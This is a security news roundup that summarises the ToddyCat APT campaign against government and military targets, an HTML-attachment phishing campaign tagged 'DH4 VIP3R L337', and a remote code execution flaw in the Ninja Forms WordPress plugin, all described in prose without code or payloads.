Researchers have noticed a campaign attributed to a new APT Group “ToddyCat” targeting high-profile entities in Europe and Asia.
Researchers disclosed a year-long campaign active since December 2020 Targeting organizations in Asia and Europe. The threat actor behind it is new to the scene and named “ToddyCat” by the researchers. The group’s prime targets are very high-profile organizations related to government, military entities and military contractors.
Researchers believe that the threat actor group has been exploiting a Microsoft Exchange vulnerability from the start of the campaign in December 2020 but do not have sufficient proof to confirm it. Yet the one fact which is confirmed is that all compromised machines between December and February are Microsoft Exchange Servers.
Researchers divide the attack into three phases. The first phase started in December 2020 up to February 2021 and targeted a limited set of servers belonging to government organizations in Vietnam and Taiwan. The second phase occurred between February 2021 and May 2021 when the group expanded its targets to include India, Russia, Iran, and United Kingdom. In the third phase (observed in February-2022), the threat actor added organizations from Uzbekistan, Kyrgyzstan, and Indonesia to their target list. Researchers have also seen a variation in the third phase where the threat actor group also targeted desktop systems.
The threat actors were also using a previously unknown backdoor named “Samurai” and new trojan malware “Ninja Trojan.” In a few specific cases, the researchers noticed that the “Samurai” backdoor was used to deploy “Ninja.” Both malware has the capability to take control of compromised systems and conduct lateral movement within the compromised network.
The new APT group “ToddyCat” is sophisticated and uses various techniques to remain low profile. The researchers speculate that the APT is targeting the same industries and countries usually targeted by Chinese groups but till now the researchers are unable to attribute these attacks to any known threat group.
The targeted organizations are high profile in nature and related to government and military which suggests the motivation could be to advance geopolitical interests.
The targeted countries include Taiwan, Vietnam, Afghanistan, India, Pakistan, Iran, Malaysia, Russia, Slovakia, Thailand, United Kingdom, Kyrgyzstan, Uzbekistan, and Indonesia.
Recently researchers noticed a spearphishing campaign having the unique string “DH4 VIP3R L337” has been used to steal the credentials of victims belonging to financial services and security firms. The campaign used 147 lures to compromise 164 users at the time of publication.
The attack is using a customized HTML attachment payload and upon opening the file, it redirects the victim to a phishing page impersonating a service normally used by the victim. The phishing page prompts the user to enter his/her credentials, then the credential gets validated through the PHPMailer library on the server-side, and on success, the credentials would be sent to an attacker-controlled email-id, and the victim is redirected to the pdf document hosted on Microsoft OneDrive. If the validation and verification process failed, an error message would be sent to the user which further redirects the victim to the legitimate equivalent of the phishing site. Researchers suspect that these HTML attachments are automatically generated by a sophisticated payload generator kit named “VIP3R_L33T Generator.”
The use of malicious HTML attachments is the key as such files are exempt from default restrictions implemented in Secure Email Gateways (SEG) because of their normal usage in big financial firms to send encrypted emails.
The spearphishing campaign provides an easy way to validate compromised credentials and bypass SEG protection.
Ninja Forms, a popular forms builder WordPress plugin used in over a million sites, has been found to have a critical RCE vulnerability in version 3.6.11 and older. The flaw allows an unauthenticated user to execute arbitrary code or delete arbitrary files on the sites. This plugin is installed on over 1 million WordPress sites.
Ninja forms plugin is designed to enhance WordPress sites with easily customizable forms. One of the features is the ability to add “Merge Tags” to forms that will auto-populate values from other areas of WordPress like Post IDs and logged-in user names. Researchers discovered that unauthenticated attackers could exploit this flaw remotely to call various Ninja forms classes using a flaw in the Merge Tags feature.
Unauthenticated attackers take over unpatched WordPress sites via several exploitation chains, one of these would enable complete control of the targeted website through remote code execution via deserialization.